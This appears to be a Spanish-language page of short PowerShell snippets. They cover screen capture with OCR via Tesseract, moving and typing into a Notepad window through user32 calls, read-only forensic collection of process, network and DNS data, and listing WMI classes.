(1 votes, average: 5.00 out of 5)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | [Reflection.Assembly]::LoadWithPartialName("System.Drawing") function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path,'bmp') $graphics.Dispose() $bmp.Dispose() } #Parte izquierda: la posición x es igual a 0 hasta que la posición x sea igual a la mitad de la pantalla for($i=0; $i -lt 720; $i=$i+30) { #Sin acumular, línea a línea de tamaño 30 $bounds = [Drawing.Rectangle]::FromLTRB(0, $i, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width/2, $i+30) #Acumulado #$bounds = [Drawing.Rectangle]::FromLTRB(0, 0 [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width/2, $i+30) $fichero='d:\power\capturap\'+$i+'.png' #Realizar captura screenshot $bounds $fichero D:\program\tesseract-ocr-3.02-win32-portable\Tesseract-OCR\tesseract.exe $fichero $fichero.Replace('.png','') -l eng | Out-Null gc $fichero.Replace('.png','.txt') } #Parte derecha: la posición x es igual a la mitad de la pantalla hasta que la x sea igual al tamaño completo de la pantalla for($i=0; $i -lt 720; $i=$i+30) { #Sin acumular, línea a línea de tamaño 30 $bounds = [Drawing.Rectangle]::FromLTRB([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width/2, $i, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, $i+30) #Acumulado #$bounds = [Drawing.Rectangle]::FromLTRB([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width/2, 0, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, $i+30) $fichero='d:\power\capturap\'+$i+'.png' #Realizar captura screenshot $bounds $fichero D:\program\tesseract-ocr-3.02-win32-portable\Tesseract-OCR\tesseract.exe $fichero $fichero.Replace('.png','') -l eng | Out-Null gc $fichero.Replace('.png','.txt') } |
Mover un proceso en diagonal de una posición de la pantalla a otra y que siempre permanezca en primer plano
(1 votes, average: 5.00 out of 5)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | #Abrir Notepad #¡Cuidado! porque puede desaparecer de la pantalla debido a la resolución de pantalla Add-Type @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern bool MoveWindow(IntPtr hWnd, int X, int Y, int nWidth, int nHeight, bool bRepaint); } "@ for($posicion=0;$posicion -lt 800;$posicion=$posicion+100) { $Script=New-Object -ComObject WScript.Shell $Proceso=(Get-Process notepad) $Script.AppActivate($Proceso.MainWindowTitle) [Win32]::MoveWindow(($Proceso).MainWindowHandle, $posicion, $posicion, 500, 400, $true) Start-Sleep -Seconds 2 } |
Mover Notepad de una posición de la pantalla a otra y escribir un texto dentro del proceso
(1 votes, average: 5.00 out of 5)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | #Activar Notepad, moverlo a otra posición de la pantalla a otra y escribir un texto dentro de notepad Add-Type @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern bool MoveWindow(IntPtr hWnd, int X, int Y, int nWidth, int nHeight, bool bRepaint); } "@ $codigo=' [DllImport("user32.dll", EntryPoint = "FindWindowEx")]public static extern IntPtr FindWindowEx(IntPtr hwndParent, IntPtr hwndChildAfter, string lpszClass, string lpszWindow); [DllImport("User32.dll")]public static extern int SendMessage(IntPtr hWnd, int uMsg, int wParam, string lParam); ' $acciones=Add-Type -MemberDefinition $codigo -Name TextoNotepad -PassThru #FindWindowEx(IntPtr hwndParent, IntPtr hwndChildAfter, string lpszClass, string lpszWindow) #SendMessage(IntPtr hWnd, int uMsg, int wParam, string lParam) $notepad=Start-Process notepad -PassThru $notepad.WaitForInputIdle() Start-Sleep -Seconds 3 $Script=New-Object -ComObject WScript.Shell $Script.AppActivate($notepad.MainWindowTitle) [Win32]::MoveWindow(($notepad).MainWindowHandle, 100, 200, 300, 400, $true) Start-Sleep -Seconds 3 $acciones::SendMessage([IntPtr]$acciones::FindWindowEx($notepad.MainWindowHandle, [IntPtr]::Zero, "Edit", $null), 0x000C, 0, "Texto") |
Mover un proceso en horizontal de una posición de la pantalla a otra y que siempre permanezca en primer plano
(No Ratings Yet)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | #Abrir Notepad Add-Type @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern bool MoveWindow(IntPtr hWnd, int X, int Y, int nWidth, int nHeight, bool bRepaint); } "@ for($posicion=100;$posicion -lt 800;$posicion=$posicion+100) { $Script=New-Object -ComObject WScript.Shell $Proceso=(Get-Process notepad) $Script.AppActivate($Proceso.MainWindowTitle) [Win32]::MoveWindow(($Proceso).MainWindowHandle, $posicion, 200, 500, 400, $true) Start-Sleep -Seconds 2 } |
Activar y mover un proceso de una posición de la pantalla a otra
(No Ratings Yet)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | #Abrir Notepad en una posición y después indicarle otra en la función MoveWindow Add-Type @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern bool MoveWindow(IntPtr hWnd, int X, int Y, int nWidth, int nHeight, bool bRepaint); } "@ $Script=New-Object -ComObject WScript.Shell $Proceso=Get-Process notepad #$Proceso=Get-Process mspaint $Script.AppActivate($Proceso.MainWindowTitle) [Win32]::MoveWindow(($Proceso).MainWindowHandle, 100, 200, 300, 400, $true) |
Adquisición de datos volátiles
(1 votes, average: 5.00 out of 5)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 | #Información sobre procesos Get-Process | Select-Object Name,Path,Company,CPU,Product,TotalProcessorTime,StartTime #Información sobre hilos (Get-Process chrome | Select-Object Threads).Threads Get-Process | select -expand Threads #Información sobre conexiones #https://www.jesusninoc.com/2015/11/13/cmdlets-for-tcpip-model-layers/ Get-NetAdapterHardwareInfo Get-NetAdapter -Physical Get-NetNeighbor Get-NetAdapterStatistics Get-NetAdapter | Select-Object Name,MacAddress Get-NetAdapter | Select-Object Name,MacAddress Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress Get-NetAdapter | Select-Object Name,MacAddress Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress ((Get-NetAdapterBinding).DisplayName) -match 'Protocolo de Internet' (Get-NetIPInterface) | Select-Object InterfaceAlias,AddressFamily Get-NetIPv4Protocol Get-NetIPv6Protocol Get-NetRoute Get-NetNat Get-NetNatExternalAddress Get-NetNatGlobal Get-NetNatSession Get-NetNatStaticMapping Get-NetNatTransitionConfiguration Get-NetNatTransitionMonitoring Get-NetFirewallAddressFilter Get-NetFirewallApplicationFilter Get-NetFirewallInterfaceFilter Get-NetFirewallInterfaceTypeFilter Get-NetFirewallPortFilter Get-NetFirewallProfile Get-NetFirewallRule Get-NetFirewallSecurityFilter Get-NetFirewallServiceFilter Get-NetFirewallSetting Get-NetTCPSetting Get-NetTCPConnection Get-NetTCPConnection | Select-Object LocalPort,Remoteport Get-NetUDPSetting Get-NetUDPEndpoint (Get-NetUDPEndpoint).LocalPort Get-DnsClient Get-DnsClientCache Get-DnsClientGlobalSetting Get-DnsClientNrptGlobal Get-DnsClientNrptPolicy Get-DnsClientNrptRule Get-DnsClientServerAddress #Fecha y hora del sistema Get-Date #Última hora de arranque del sistema Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime Get-WmiObject win32_operatingsystem | select csname, @{LABEL='LastBootUpTime';EXPRESSION={$_.ConverttoDateTime($_.lastbootuptime)}} #DLL Get-Process | select -expand MainModule Get-Process | select -expand Modules |
Mover un proceso de una posición de la pantalla a otra
(No Ratings Yet)Loading...1 2 3 4 5 6 7 8 9 10 11 | #Abrir Notepad en una posición y después indicarle otra en la función MoveWindow Add-Type @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern bool MoveWindow(IntPtr hWnd, int X, int Y, int nWidth, int nHeight, bool bRepaint); } "@ [Win32]::MoveWindow((Get-Process -Name notepad).MainWindowHandle, 100, 200, 300, 400, $true) |
Listar todas las propiedades de las clases Win32
(No Ratings Yet)Loading...1 2 3 4 5 6 | (Get-WmiObject -List).name | Select-String Win32 | %{ $_ pause Get-WmiObject -Class $_ pause } |